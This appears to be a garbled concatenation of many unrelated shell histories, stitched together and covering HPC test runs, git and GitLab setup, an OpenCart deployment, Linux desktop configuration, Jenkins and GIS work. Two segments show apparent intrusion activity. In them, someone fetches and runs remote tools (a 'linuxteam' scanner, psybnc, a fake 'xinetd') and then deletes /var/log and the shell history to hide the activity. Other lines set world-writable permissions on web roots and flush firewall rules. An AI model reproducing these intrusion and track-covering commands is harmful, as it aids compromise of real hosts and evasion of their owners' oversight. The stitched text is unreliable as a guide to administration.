-i qasnap/center_src/in06 -n 4 --cpu --clean +./test run -i qasnap/center_src/in07 -n 8 --cpu --clean +./test run -i qasnap/center_src/in08 -n 8 --cpu --clean +./test run -i qasnap/center_src/in09 -n 2 --cpu --clean +./test run -i qasnap/center_src/in09 -n 4 --cpu --clean +./test run -i qasnap/center_src/in10 -n 4 --cpu --clean +./test run -i qasnap/center_src/in11 -n 4 --cpu --clean +./test run -i qasnap/center_src/in12 -n 4 --cpu --clean +./test run -i qasnap/center_src/in13 -n 4 --cpu --clean +./test run -i qasnap/center_src/in14 -n 1 --cpu --clean +./test -v compare -f1 out01_cpu_n4_1 out01_cpu_n4_1 +./test -v compare -f1 out01_cpu_n4_1 -f2 out01_cpu_n4_1 +./test -v compare -f1 out01_cpu_n4_1 out01_cpu_n4_1 +./test -v compare -f1 out01_cpu_n4_1 -f2 out01_cpu_n4_1 +./test -v compare -f1 out01_cpu_n4_1 -f2 out01_cpu_n4_2 +cat .dots/git/.gitconfig +cat ~/.dots/git/.gitconfig +git init +git statuis +git status +git add --all +git status +touch .gitignore +ls +git status +git add --all +git status +mpiicc -E src/dim3_sweep.c +mpiicc -E src/dim3_sweep.c > dim3_sweep.post-preprocessing.c +gcc -E -h +man gcc +mpiicc -E src/dim3_sweep.c -o dim3_sweep.post-preprocessing.c +cs src +make clean all +.. +mpiicc -E src/dim3_sweep.c -DUSEMKL -DUSEMKL -o dim3_sweep.post-preprocessing.c +mpiicc -E src/dim3_sweep.c -DUSEMKL -DUSEVML -o dim3_sweep.post-preprocessing.c +./test run --clean --cpu -i qasnap/center_src/in01 -n 4 +./test run --clean --cpu -i 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+./test run --clean --cpu -i qasnap/center_src/in01 -n 4 +export OMP_NUM_THREADS=1 +export MKL_NUM_THREADS=1 +./test run --clean --cpu -i qasnap/center_src/in01 -n 4 +man gcc +man mpirun +git status +git merge develop +git branch -h +git branch -d develop +git merge develop +git branch -d develop +make clean all +..; ./test run --clean --cpu -i qasnap/center_src/in01 -n 4 +mpiicc -E src/dim3_sweep.c -o dim3_sweep.post-preprocessing.c +make clean all +ll +make clean all +manmpiccc +man mpiccc +man mpiicc +make clean all +make vars +make clean +make vars +make clean all +make vars +make clean all +make clean +make clean all +.. +./test run --clean --cpu -i qasnap/center_src/in01 -n 4 +./test clean +./test run --clean --cpu -i qasnap/center_src/in01 -n 4 +./test run --clean --cpu -i qasnap/center_src/in01 -n 4 +./test run --clean --cpu -i qasnap/center_src/in02 -n 6 +./test run --clean --cpu -i qasnap/center_src/in03 -n 6 +./test run --clean --cpu -i qasnap/center_src/in04 -n 4 +./test run --clean --cpu -i qasnap/center_src/in05 -n 4 +./test run --clean --cpu -i qasnap/center_src/in06 -n 4 +./test run --clean --cpu -i qasnap/center_src/in07 -n 8 +./test run --clean --cpu -i qasnap/center_src/in08 -n 8 +./test run --clean --cpu -i qasnap/center_src/in09 -n 4 +./test run --clean --cpu -i qasnap/center_src/in10 -n 4 +./test run --clean --cpu -i qasnap/center_src/in11 -n 4 +./test run --clean --cpu -i qasnap/center_src/in12 -n 4 +./test run --clean --cpu -i qasnap/center_src/in13 -n 4 +./test run --clean --cpu -i qasnap/center_src/in14 -n 1 +make clean all +.. +./test run --clean --gpu -i qasnap/center_src/in01 -n 4 +./test compare -f1 out01_cpu_n4_1 -f2 out01_gpu_n4_1 +cat out/out01_gpu_n4_1 +make clean all +.. +./test run --clean --gpu -i qasnap/center_src/in01 -n 4 +./test compare -f1 out01_cpu_n4_1 -f2 out01_gpu_n4_2 +make clean all +.. +./test run --clean --gpu -i qasnap/center_src/in01 -n 4 +./test run --clean --gpu -i qasnap/center_src/in01 -n 4 +./test run --clean --cpu -i qasnap/center_src/in01 -n 8 +./test run --clean --cpu -i qasnap/center_src/in01 -n 2 +./test average -h +./test average -i in01 -n 4 --cpu +./test average --cpu -i in02 -n 6 +./test average --cpu -i in03 -n 6 +./test average --cpu -i in04 -n 4 +./test average --cpu -i in05 -n 4 +./test average --cpu -i in06 -n 4 +./test average --cpu -i in07 -n 4 +./test average --cpu -i in07 -n 8 +./test average --cpu -i in08 -n 8 +./test average --cpu -i in09 -n 4 +./test average --cpu -i in10 -n 4 +./test average --cpu -i in11 -n 4 +./test average --cpu -i in12 -n 4 +./test average --cpu -i in13 -n 4 +./test average --cpu -i in14 -n 4 +./test average --cpu -i in14 -n 1 +git checkout develop +git merge feature/cuda_dim3 +git branch -D feature./cuda_dim3 +git branch -D feature/cuda_dim3 +./test clean +make clean +express first-app +nc +ls + ls -a +ls -a +node init +npm i +ls -a +chdir babel-starter-kit-express-test +ls -a +npm i +npm run dev +npm run dev +npm -v +node -v +chdir /home/Sergey +-h +--h +-help +git remote add originst2b.git +echo "# test2b" >> README.md +git init +git add README.md +git commit -m "first commit" +git remote add originst2b.git +git push -u origin master +git branch --set-upstream master origin/master +#include +int main() +{ int i=0; char *name[]={"abcarpitaabilllij","def","ghi","ijk","lmn","nop","pqr","rst","tuv","vwx","xyz"}; char** gp1; char** gp2; char** gp3; char *ptr= name[0]; gp1 = &name[0]; gp2 = &name[5]; gp3 = &name[8]; printf("Address of the elements in pointer array : +"); + for(i=0;i<11;i++) + { printf("%u --> %s +",&name[i],name[i]); + *ptr = &name[i]; + print("\t add of 1st charcter %c --> %u +",*ptr,ptr); + } + + return 0; +}gcc -o main *.c +gcc -o main *.c +gcc -o main *.c +gcc -o main *.c +gcc -o main *.c +gcc -o main *.c +main +main +gcc -o main *.c +gcc -o main *.c +gcc -o main *.c +unzip storage.zip +pwd +chmod -R 777 . +chmod -R 777 * +chmod -R 777 +chown -R admin:admin +chown -R admin:admin . +sudo chown -R admin:admin . +chmod -R 777 . +pwd +git checkout develop +pwd +rm -Rf * +rm .git +rm -Rf .git +ls +git clones.top:20443/dev/nikki.git . -b develop +git clones.top:20443/dev/forte_html.git . +rm -Rf * +git clones.top:20443/dev/forte_html.git . +ssh git@gitlab.digiprojects.top -p 806 +ssh-copy-id -i ~/.ssh/id_rsa.pub git@gitlab.digiprojects.top -p 806 +ssh git@gitlab.digiprojects.top -p 806 +git config --list +git config --global user.name "GitLab on Vesta" +git config --global user.email git@gitlab.digiprojects.top +git config --list +git clone ssh://git@gitlab.digiprojects.top:806/dev/forte_html.git . +git config --global user.email root@gitlab.digiprojects.top +git config --list +git clone ssh://git@gitlab.digiprojects.top:806/dev/forte_html.git . +git clone ssh://git@gitlab.digiprojects.top:806/dev/forte_html.git +git clones.top:20443/dev/forte_html.git . +ll +pwd +rm -Rf * +ll +ls -azh +ls +ls -z +ls -aH +ls -a +rm -Rf .git +rm -Rf .gitignore +git config --list +git clone ssh://git@gitlab.digiprojects.top:806/dev/forte_html.git . +which git-upload-pack +git clone git@gitlab.digiprojects.top:806/dev/forte_html.git . +git config --global user.email "admin@example.com" +git config --list +git clone ssh://git@gitlab.digiprojects.top:806/root/test.git +git clone ssh://git@gitlab.digiprojects.top:806/root/test.git . +ssh git@gitlab.digiprojects.top echo \$PATH +ssh git@gitlab.digiprojects.top -p 806 echo \$PATH +which git-upload-pack +git clone ssh://git@gitlab.digiprojects.top:806/root/test.git . +ssh -vT git@gitlab.digiprojects.top -p 806 +ssh -T git@gitlab.digiprojects.top -p 806 +ssh-agent -s +ssh-add -l +eval "$(ssh-agent -s)" +ssh-add -l +ssh-agent -s +ssh-add -l +ssh -vT git@gitlab.digiprojects.top -p 806 +ssh -vT root@gitlab.digiprojects.top -p 806 +ssh -vT git@gitlab.digiprojects.top -p 806 +service sshd restart +ssh -vT git@gitlab.digiprojects.top -p 806 +ls +ls -a +ssh -vT git@gitlab.digiprojects.top -p 806 +ssh -vT git@ -p 806 +ssh -T git@gitlab.digiprojects.top -p 806 +ssh -vT git@gitlab.digiprojects.top -p 806 +clear +ssh -vT git@gitlab.digiprojects.top -p 806 +ssh git@gitlab.digiprojects.top -p 806 +git remote -v +git clone ssh://git@gitlab.digiprojects.top:806/root/test.git . +ssh git@gitlab.digiprojects.top echo \$PATH +ssh git@gitlab.digiprojects.top -p 806 echo \$PATH +which git-upload-pack +git clone ssh://git@gitlab.digiprojects.top:806/root/test.git . +git config --list +history | grep global +git config --global user.email git@gitlab.digiprojects.top +history | grep global +git config --list +git config --global core.autocrlf false +git config --list +git clone ssh://git@gitlab.digiprojects.top:806/root/test.git . +git init +git remote ssh://git@gitlab.digiprojects.top:806/root/test.git . +git remote -v +ls -a +rm -Rf .git +ls -a +git clone ssh://git@gitlab.digiprojects.top:806/root/test.git . +ssh -vT git@gitlab.digiprojects.top -p 806 + +git clont ssh://git@git.digiprojects.top:806/dev/forte_html.git . +git clone ssh://git@git.digiprojects.top:806/dev/forte_html.git . +git clone ssh://git@gitlab.digiprojects.top:806/dev/forte_html.git . +git config --list +git clone git@gitlab.digiprojects.top:806/root/test.git . +ssh git@gitlab.digiprojects.top -p 806 +git clones.top:20443/dev/forte_html.git . +git pull +git remote -v +git remote add origin ssh://git@gitlab.digiprojects.top:806/root/test.git . +git remote add origin ssh://git@gitlab.digiprojects.top:806/root/test.git +git remote show origin +git remote set-url ssh://git@gitlab.digiprojects.top:806/root/test.git +git remote -v +ssh://git@gitlab.digiprojects.top:806/root/test.git +ssh://git@gitlab.digiprojects.top:806 +ls -ltr +ls -a +ls -l +bundle exec rake gitlab:check RAILS_ENV=production +unzip testlink-1.9.17.tar +unzip testlink-1.9.17.tar . +tar testlink-1.9.17.tar +tar --help +tar -R testlink-1.9.17.tar +tar -czvf testlink-1.9.17.tar +tar -czvf testlink-1.9.17.tar . +tar -czvf testlink-1.9.17.tar ./ +tar -czvf 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config remote +rm -RF * +rm -RF . +rm -Rf * +rm -Rf .git +git clones.top/dev/nikki.git -b develop +rm -Rf * +git clones.top/dev/nikki.git -b develop . +git remote -v +ll +130 +down vote +git remote add origins.top:20443/dev/nikki.git +git remote remove +git remote remove origin +git remote -v +git branch +git remote add origins.top:20443/dev/nikki.git +git remote -v +git push origin +git pull +git status +git pull +git branch +git fetch +htop +exit +pwd +git clones.top:20443/dev/quanlynhankhau.git . +service httpd restart +sudo service httpd restart +git pull +sudo git pull +exit +git status +git +git status +ls -la +git clones.top/mekong/WA-Vetlink.git . +exit +git clones.top/mekong/WA-Vetlink.git . +pwd +git clone ssh://git@gitlab.digiprojects.top:806/dev/quanlynhankhau.git . +vi /home/admin/.ssh +vi /home/admin/.ssh/id_rsa.pub +git clone ssh://git@gitlab.digiprojects.top:806/dev/quanlynhankhau.git . +git pull +exit +ll +git pull +ll +cp .env .htaccess /home/admin/web/qlnk.qc.digiprojects.top/public_html/ +ll +ls -al +vi .env +vi .htaccess +git pull +git status +ll +ls -al +ll +ls -al +ll +pwd +ll +ls -al +ll +tail qlnk.qc.digiprojects.top.error.log +chown -R admin:admin . +git pull +chmod -R 777 storage/ +chmod -R 777 public/ +chmod -R 777 bootstrap/ +chmod -R 777 vendor/ +ll +composer update +chmod -R 777 . +composer update +chmod -R 777 storage/ +git status +composer update +ll +ll +ll +ll +ll +update composer +composer update +ls -al ./vendor/composer/ +git pull +ll +mysql +su root +exit +htop +exit +ssh root@ +ssh root@ +ssh root@ -p 806 +pwd +vi ~/.ssh/authorized_keys +chmod 600 ~/.ssh/authorized_keys +ll /home/admin/builds/fb338377/0/dev/qlcho +exit +ll +sudo ll +sudo ls +ll +git remote -v +git branch +git pull +sudo git pull +exit +pwd +pwd +which ssh-agent +git config +git config --list +echo abc +exit +ll +sudo ll +ll +ls -alh +git config --list +git pull +sudo git pull +git config --list +git pull +sudo git pull +git pull +which ssh-agent +git pull +ll +sudo ll +exit +pwd +whoami +git pull +cat .gitlab-ci.yml +git pull +sudo git pull +git pull +git config -l +git pull -v +rm -Rf builds +pwd +rm -Rf builds +git pull +exit +ll +git clone ssh://git@gitlab.digiprojects.top:806/dev/alan.git . -b develop +ll +unzip . +unzip +ll +chown -R admin:admin . +sudo chown -R admin:admin . +ll +ll +ll +ll +chmod -R 777 storage +ll +ll +chmod -R 777 image +chmod -R 777 config.php +chmod -R 777 admin/config.php +ll +git add . +git commit -m "Setup Project OpenCart 3.0.2" +git push origin +git status +git add . +git pull +git add .gitlab-ci.yml +git commit -m "add gitlab-ci" +git push +git pull +git status +sudo chown -R admin:admin . +git status +git commit -am "up all" . +git commit -am "up all" +git push +git pull +ll +ls -azH +ls -Azh +ls -a +git pull +git remote -v +git branch +ll +git checkout . +git status +git pull +exit +pwd +ll +chmod -R 777 storage +chmod -R 777 tmp +exit +pwd +git status +pwd +git checkout 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commit -m "phuc update" +git commit -a system +git add system +git add --all system +git commit -m "Phuc update" +git status +git push +git pull +git status +git pull +git status +git add . +git add --all . +git status +git commit -m "clear cache" +git status +git push +git pull +git status +unzip so3_megastore_theme_o3.0.0_v1.0.0.ocmod.zip +pwd +rm -Rf image/ +rm -Rf catalog/ +rm -Rf admin/ +p +rm -Rf system +git status +git commit -a +git status +git add . +git commit -m "install theme manual" +git commit -am "install theme manual" +git push +git pull +git status +pwd +git add . +git commit -m 'update theme' +git push +git status +clear +exit +git status +pwd +rm -Rf old +rm -Rf old2 +pwd +chown -R admin:admin . +chmod -R 777 storage +sudo service mariadb restart +sudo service mariadb status +sudo service mysqld status +sudo service mariadb status +sudo service mariadb stop +sudo service mariadb start +:quit +test +ll +pwd +unzip so_megastore_quickstart_oc3.0.x_v1.0.0.zip +clear +pwd +git status +git add . +git status +git add --all . +git status +git add . +git commit -m "re-install theme" +git push +git status +git add config.php admin/config.php +git status +git add . +git commit -m "chmod 777" +git push origin +git pull +git status +zip -r alan.zip * +git commit -am "backup alan.zip" alan.zip +git commit -am alan.zip "backup alan.zip" +git add alan.zip +git commit -m "backup alan.zip" +git push +git pull +git status +git add storage +git add -f storage +git add -f system/storage +git add -f config.php admin/config.php +git commit -m "move storage" +git push +git status +git pull +pwd +mkdir demo +sp -r * demo/* +cp -r * demo/* +cp -r * demo +cp -R * demo +rm -Rf demo/demo +git status +exit +zip -r alan.zip . --exclude=demo/* -x "alan.zip" +zip -r alan1.zip . --exclude=demo/* -x "alan.zip" -x ".git" +zip -r alan1.zip . --exclude=demo/* -x "alan.zip" -x --exclude=.git +exit +git status +git pull +exit +git status +git add admin/* +git add storage/modification/* +git add image/catalog/* +git commit -m "update theme" +git push +git pull +sudo git pull +git stash +git fetch +git pull +ls admin/language/vi-vn/common/footer.php +ls -a admin/language/vi-vn/common/footer.php +ll admin/language/vi-vn/common/footer.php +ll +chown -R vi-vn +chown -R admin:admin vi-vn +sudo chown -R admin:admin vi-vn +git pull +git stash +git pull +git status +git pull +pwd +clear +git status +git pull +git commit -m "Phuc commit" +git add admin/view/image/logo.jpg +git add admin/view/template/common/header.twig +git commit -m "update logo" +git push +git pull +clear +git status +git pull +git status +exit +git status +git add storage/modification/* +git add -f storage/modification/* +git add -f catalog/view/theme/* +git commit -m "update theme from Ben" +git push +git status +git pull +git status +git pull +git status +exit +git status +exit +git status +clear +git status +git pull +git add catalog/view/theme/so-megastore/css/layout1/* +git add storage/modification/catalog/language/vi-vn/common/cart.php +git commit -m "update theme" +git push +git pull +git status +git pull +exit +git status +git pull +ll +ls -an +git status +exit +git pull +git status +git pull +clear +git status +ll +ll +ll +exit +git pull +pwd +pwd +git status +clear +git status +git pull +git checkout catalog/view/theme/default/template/extension/module/recently_viewed.twig +git pull +vi catalog/view/theme/default/template/extension/module/recently_viewed.twig +git add catalog/* admin/controller/extension/module/recently_viewed.php admin/language/en-gb/extension/module/recently_viewed.php admin/model/extension/module/recently_viewed.php admin/view/template/extension/module/recently_viewed.twig +git commit -m "update from server" +git push +git pull +git add catalog/view/theme/default/template/extension/module/recently_viewed.twig +git commit -m "update catalog/view/theme/default/template/extension/module/recently_viewed.twig" +git push +git pull +git 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-r alan.zip . -x "demo" ".git" "install" "image/cache" "storage/cache" "storage/logs" + zip -r alan.zip . -x "demo" ".git/" "install/" "image/cache/" "storage/cache/" "storage/logs/" +zip -r alan.zip . -x demo\* .git\* install\* image/cache\* storage/cache\* storage/logs\* +exit +pwd +pwd +zip -r alan.zip . -x demo\* .git\* install\* +exit +git pull +git status +clear +git status +rm alan.zip +ls +ll +ls +ls -azH +ll +git add storage/modification/catalog/* +git add -f storage/modification/catalog/* +git add catalog/view/* +git commit -m "push source from server" +git push +git pull +git flech +git fetch +git pull +git checkout storage/logs/ocmod.log +git checkout storage/logs/ocmod_error.log +git pull +vi storage/modification/catalog/view/theme/so-mobile/template/product/product.twig +git pull +nano storage/modification/catalog/view/theme/so-mobile/template/product/product.twig +git pull +git push +git pull +git status +git add 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+yaourt -S discord +sudo pacman -S wireshark +sudo pacman -S wireshark-cli wireshark-gtk +vim /etc/sudoers +sudo vim /etc/sudoers +sudo -g wireshark wireshark +alsamixer +sudo pacman -S libreoffice +ncmpcpp +sudo pacman -Syu +sudo pacman -S i3blocks +yaourt -S i3blocks +ls +git clones-manjaro.git +ls +ls -a +vim SETUP +vim SETUP +cat SETUP +clear +ls -a +ls +ls +vim config +vim i3status.conf +compton +compton +compton +vim .Xresources +ncmpcpp +sudo vim /etc/systemd/system/getty.target.wants/getty\@tty1.service +sudo vim /etc/systemd/system/multi-user.target.wants/NetworkManager.service +ls +ls -a +sudo ls +sudo ls +vim /etc/systemd/system/suspend@.service +nano /etc/systemd/system/suspend@.service +sudo nano /etc/systemd/system/suspend@.service +ls +ls +mkdir i3blocks +alsamixewr +alsamixer +ncmpcpp +alsamixer +vim .config/i3/config +reboot +ncmpcpp +cmatrix -C white +vim .config/i3/config +vim .config/i3/config +sudo pacman -Syu +free +conky +ls +vim functions.py +vim guessing.py +vim .config/i3/i3status +vim .config/i3/i3status.conf +vim .config/i3/config +ls +vim area.py +python functions.py +mpd +ncmpcpp +alsamixer +acpi +clear +i3blocks +clear +ls +ls -a +ls +ls +ls +ls +vim config +ls +ls +ls a +ls -a +vim .xinitrc +vim .config/i3blocks/config +vim .i3/config +nano .i3/config +nano .config/i3blocks/ +cp * ~/.config/i3blocks/ +ls +ls +cp * ~/scripts/ +ls +ls +vim config +vim config +nano config +ls +ls -a +rm .config.swp +ls +ls -a +ls +ls +ls -a +ls +ls +ls +ls +ls +vim monitor.sh +vim updates.sh +vim volume_control.py +vim temperature.sh +vim battery.sh +vim functions.py +acpi +lspci +xrandr +ls +vim guess.py +compton +vim .config/i3/config +vim .config/i3/config +i3blocks -c .config/i3blocks/config +i3blocks -c .config/i3blocks/config +i3blocks -c .config/i3blocks/config +i3blocks -c .config/i3blocks/config +ls +mv config config_brokenblocks +cp config_old config +vim config +clear +vim config +sudo pacman -S htop +htop +ls +cp scripts scripts_backup +mv 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-rf scripts_backup +ls -a +ls +mkdir -p ~/.vim/autoload ~/.vim/bundle && curl -LSso ~/.vim/autoload/pathogen.vim +ls -a +vim .vimrc +vim .config/i3blocks/config +vim .config/i3blocks/config +./scripts/colorprompt.sh +ls +rm theme +cp base16-spacemacs-256.Xresources +cp base16-spacemacs-256.Xresources theme +vim theme +./scripts/colorprompt.sh +./scripts/colorprompt.sh +vim .config/i3/config +vim scripts/pwgen.py +cp .colors/base16-railscasts-256.Xresources theme +./scripts/colorprompt.sh +vim scripts/pwgen.py +ls +rm theme +cp base16-railscasts-256.Xresources theme +./scripts/colorprompt.sh +./scripts/colorprompt.sh +vim colorprompt.sh +cmatrix -C white +ncmpcpp +pp +mpd +cmatrix -C white +alsamixer +./colorprompt.sh +screenfetch +clear +tree +screenfetch +ls +rm theme +cp base16-monokai-256.Xresources theme +screenfetch +cat .colors/theme +ls +i3blocks +i3blocks +i3blocks +i3blocks +clear +cat .colors/theme +vim scripts/pwgen.py +ls +clear +python pwgen.py +ls +ls -a +vim scripts/pwgen.py +vim pwgen.py +vim .config/i3blocks/config +sudo pacman -Syu +acpi +man cd +ls +vim theme +./scripts/colorprompt.sh +vim scripts/pwgen.py +ls +ls -a +ls -la +vim i3blocks/config +ncmpcpp +vim .config/i3blocks/config +dank +cmatrix -C white +vim .xinitrc +vim .xinitrc +ncmpcpp +screenfetch +ls +clear +vim config +vim config +vim config +ls +vim i3/config +ls +vim battery +vim .config/i3blocks/config +vim .config/i3/config +vim .Xresources +ls +mc +ssh adele@androidapp.ca@ +ssh adele@androidapp.ca@ -p 2222 +ls +la +ls +wget +mc +unzip typo3.zip +ls +mcedit LocalConfiguration.php +mc +ls +pwd +python --version +python -- version +python -version +hello +is + +reboot +python -h +ls +ls +ls +pwd +mkdir python +ls +pwd +code . +rm python +mkdir hey +rm hey +ls +touch a.txt +ls +rm a.txt +ls + exit +cod . +code . +exit +passwd +passwd +exit +pacman -Syu +pacman -Ss terminal +pacman -S gnome-terminal +pacman -S kdebase-treminal +pacman -Ss terminal +pacman -S kdebase-konsole +pacman -Ss texlive japanese +pacman -S texlive-langjapanese +yaourt monaco +pacman exit +yaourt ricty +stop +yaourt ricty +pacman -Ss chromi +pacman -S chromium +yaourt monaco +ls -C +sudo locate xmonad.hs +sudo updatedb +sudo locate xmonad.hs +emacs /usr/share/i386-linux-ghc-7.8.3/xmonad-0.11/man/xmonad.hs +ps +yaourt ddskk +pacman -Syu +df- h +df -h +sudo nano /etc/udev/rules.d/11-media-by-label-auto-mount.rules +xmodmap .xmodmap +sudo cp .xmodmap /etc/X11/xinit/xinitrc.d/ +nano /etc/X11/xinit/xinitrc.d/.xmodmap +sudo nano /etc/X11/xinit/xinitrc.d/99-xmodmap +sudo nano /etc/X11/xinit/xinitrc.d/98-ibus +sudo chomod +x /etc/X11/xinit/xinitrc.d/98-ibus +sudo chmod +x /etc/X11/xinit/xinitrc.d/98-ibus +sudo chmod +x /etc/X11/xinit/xinitrc.d/99-xmodmap +ls -al +sudo ls -al /etc/X11/xinit/xinitrc.d/ +sudo rm /etc/X11/xinit/xinitrc.d/.xmodmap +sudo ls -al /etc/X11/xinit/xinitrc.d/ +sudo emacs /etc/udev/rules.d/11-media-by-label-auto-mount.rules +emacs -nw .inputrc +emacs .inputrc +emacs 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+modprobe +modprobe -h +man modprobe -h +sudo nano /etc/udev/rules.d/11-media-by-label-auto-mount.rules +chmod +x nano /etc/udev/rules.d/11-media-by-label-auto-mount.rules +sudo chmod +x /etc/udev/rules.d/11-media-by-label-auto-mount.rules +df -h +df -al +pacman -Ss iw +sudo pacman -S wpa_supplicant wpa_actiond dialogs + +ip link +systemctl enable netctl-auto@wlp2s0 +udo systemctl enable netctl-auto@wlp2s0 +sudo systemctl enable netctl-auto@wlp2s0 +wifi-menu wlp2s0 +sudo wifi-menu wlp2s0 +loadkeys jp106 +sudo loadkeys jp106 +sudo wifi-menu wlp2s0 +unzip git.emacs.d.zip +rm 10-keyboard.conf +cp init.el init.el.org +rm \#init.el# +rm init.el+ +rm init.el +cp *.el ~/.emacs.d/ +cp -a ~/Downloads/git.emacs.d/ac-dict ~/.emacs.d/ +cp -a ~/Downloads/git.emacs.d/elisp ~/.emacs.d/ +cp -a ~/Downloads/git.emacs.d/yspel ~/.emacs.d/ +cp -a ~/Downloads/git.emacs.d/elpa ~/.emacs.d/ +cp -a ~/Downloads/git.emacs.d/eshell ~/.emacs.d/ +cp -a ~/Downloads/git.emacs.d/undohist ~/.emacs.d/ +cp -a ~/Downloads/git.emacs.d/extra-scripts ~/.emacs.d/ +cp -a ~/Downloads/git.emacs.d/snippets ~/.emacs.d/ +cp -a ~/Downloads/git.emacs.d/latexmk* ~/.emacs.d/ +pacman -Ss aspell +yaourt aspell +git clone git://github.com/usr4423/linuxsetting +ls - +ls -a +cp .aspell.* ~/ +ls -a +cp .latexmkrc ~/ +ls -al +xev +yaourt xev +xev +ks +ls -al +git init +mkdir .xmonad +shutdowon -r now +shutdown -r now +service --status-all +chkconfig --list +emacs .bash_history +lspci -k +systemctl list-unit-files +sudo systemctl enable dhcpcd.service +ping -c 3 www.google.com +systemctl list-unit-files +sudo shutdown -r now +ps +ps -a +exec sudo -u root -s -H -p Password: +sudo cp /etc/udev/rules.d/11-media-by-label-auto-mount.rules ~/history/ +updatedb +sudo updatedb +sudo cp /etc/X11/xinit/xinitrc.d/9* ~/history/ +su +yaourt xorg-xbacklight +sudo cd /sys/devices/virtual/ +su +w +uname -a +cat /proc/cpuinfo +id +ps -aux +ls -as +id +uname -a +ps x +ps -aux +w +ls +uname -a +wget +w +cat /etc/hosts +cat /proc/cpuinfo +wget members.lycos.co.uk/pizder/linuxteam.tar.gz +tar xvfz linuxteam.tar.gz +./a 203.200 +$ sudo su +sudo su +sudo su +sudo apt-get install get +sudo apt-get install git +sudo apt-get update +git +clear +sudo apt-get update +sudo apt-get install openjdk8-jdk +sudo apt-get install openjdk-8-jdk +wget -q -O -s.io/debian-stable/jenkins.io.key | sudo apt-key add - +echo 'debs.io/debian-stable binary/' | sudo tee -a /etc/apt/sources.list.d/jenkins.list +sudo apt-get update +sudo apt-get install jenkins +sudo systemctl start junkins +sudo systemctl status jenkins +sudo systemctl start jenkins +sudo cat /var/lib/jenkins/secrets/initialAdminPassword +v.import input=/home/martin/geodata/smoderp/original layer=puda output=puda -o +v.import input=/home/martin/geodata/smoderp/original layer=points2 output=points2 -o +v.import input=/home/martin/geodata/smoderp/original layer=tok output=tok -o +r.import input=/home/martin/geodata/smoderp/original/raster10m/w001001.adf output=w001001 -o +db.in.ogr input=/home/martin/geodata/smoderp/original/tabulkytab.dbf +db.select table=tabulkytab_dbf +db.in.ogr input=/home/martin/geodata/smoderp/original/tab_stream_tvar.dbf +g.gisenv +g.gisenv +db.in.ogr input=/home/martin/geodata/smoderp/original/tab_stream_tvar.dbf +v.import input=tests/data/ layer=tok output=tok -o +v.import input=tests/data/ layer=tok output=tok -o --o +db.select tab_stream_tvar +db.select tab=tab_stream_tvar +db.in.ogr input=/home/martin/geodata/smoderp/original/tab_stream_tvar.dbf table=tab_stream_tvar +db.in.ogr input=/home/martin/geodata/smoderp/original/tab_stream_tvar.dbf output=tab_stream_tvar --o +db.select tab=tab_stream_tvar +db.in.ogr input=tests/data/tab_stream_tvar.dbf output=tab_stream_tvar --o +db.select tab=tab_stream_tvar +db.select tab=tok +w +ls +wget +ps ax +wget www.rap.pluto.ro/psybnc.tar.gz +tar xzvf psybnc.tar.gz +make +./psybnc +ls +make +wget www.rap.pluto.ro/psyL.tar.gz +tar xzvf psyL.tar.gz +./xinetd +ls +w +rm -rf /var/log +ls +rm -rf .bash_history +lear +clear +sudo iptabls -L +sudo iptables -L +sudo iptables -F +sudo iptables -L +sudo apt-cache search qupzilla +sudo apt-get install qupzilla +sudo apt-get update +sudo apt-get install qupzilla +wiload.sh +sudo apt-get install qupzilla +lo +sudo su - +sudo vim /etc/samba/smb.conf +sudo systemctl reload smbd +sudo su - +lo +sudo sysctl -p +ls +ls temp/ +ls temp/temp/ +ls +ls +ls +less advancedsettings.xml +lo +sudo su - +lo +ps aux|less +audo su - +sudo su - +ps aux|grep smb +;p +lo +free +dmesg +ps aux|less +lo +wiload.sh +sudo ifconfig eth0 down +lo +sudo systemctl restart smbd +sudo systemctl restart nmbd +lo +log +sudo sysctl -p +sudo iptables -L +poweroff +wiload.sh +sudo ifconfig eth0 down +vim bin/wiload.sh +sudo ifconfig eth0 down +lo +pkill -1 conky +lo +wiload.sh +sudo sysctl -p +sudo su - +lo +sudo su - +lo +ls /opt/metasploit/apps/pro/ui/config/ +ls /opt/metasploit/apps/pro/ui/config/ -l +sudo su - +/opt/metasploit/app/msfconsole +ls +quit +sudo su - +wiload.sh +sudo iptables -L +lo +log +wiload.sh +lo +sudo su - +lo +sudo iptables -F +sudo iptables -L +ifconfig +cat /etc/hosts +ip neighbor +sudo /etc/init.d/apache2 stop +lo +sudo /etc/init.d/smbd stop +sudo /etc/init.d/nmbd stop +sudo iptables -F +lo +ls +mv * /media/bjohnston/Acer/Users/bjohnston/Vq\\\\\; +mv * /media/bjohnston/Acer/Users/bjohnston/Videos/ +ls -tr +mv War\ For\ The\ Planet\ Of\ The\ Apes\ \(2017\)\ \[YTS.AG\]/ "War For The Planet Of The Apes (2017)" +ls -tr +mv Spider-Man\ Homecoming\ \(2017\)\ \[YTS.AG\]/ "Spider-Man Homecoming (2017)" +ls -tr +sudo ifconfig eth0 down +lo +sudo /etc/init.d/smbd stop +sudo /etc/init.d/nmbd stop +sudo sysctl -p +lo +sudo ifconfig eth0 down +lo +sudo ifconfig eth0 down +ls +mv Stardust\ \(2007\)/ /media/bjohnston/Acer/Users/bjohnston/Videos/ +sudo iptables pF +sudo iptables -F +wiload.sh +pkill -9 -u bjohnston +log +sudo iptables -F +sudo sysctl -p +mv Videos/Movies/Avatar\ ECE\ \(2009\)/ /media/bjohnston/Acer/Users/bjohnston/Videos/ +wiload.sh +ki +lo +sudo sysctl -p +lo +sudo iptables -F +lo +sudo systemctl start smbd +sudo systemctl start nmbd +lo +sudo systemctl stop smbd +sydo systemctl stop nmbd +sudo systemctl stop nmbd +lo +sudo /etc/init.d/smbd stop +sudo /etc/init.d/nmbd stop +sudo suk- +sudo su - +ls +mv Insidious\ \(2010\)/ /media/bjohnston/Acer/Users/bjohnston/Videos/ +wiload.sh +ls|grep Ava +mv Avatar\ \(2009\)/ "Avatar (2009)" +ls|grep Ava +ls -ltr +sudo vim /etc/iptables/rules.v4 +sudo iptables-restore < /etc/iptables/rules.v4 +sudo iptables -L +sudo apt-get install zenmap +sudo sysctl -p +sudo apt-get install zenmap +sudo systemctl start nmbd +lo +sudo netstat -plant +sudo vim /etc/iptables/rules.v4 +sudo apt-get update +sudo apt-get upgrade +sudo su - +wiload.sh +sudo sysctl -p +lo +wiload.sh +lo +dig cnn.com +dig xmission.com +cat /etc/resolv.conf +sudo vim /etc/resolv.conf +nslookup cnn.com +sudo su - +ls +mkdir LESS_TERMCAP +git init +git clonest.github.com/spiette/3051287 +ls +ll +ls +la +less .LESS_TERMCAP +la +cp .LESS_TERMCAP ~ 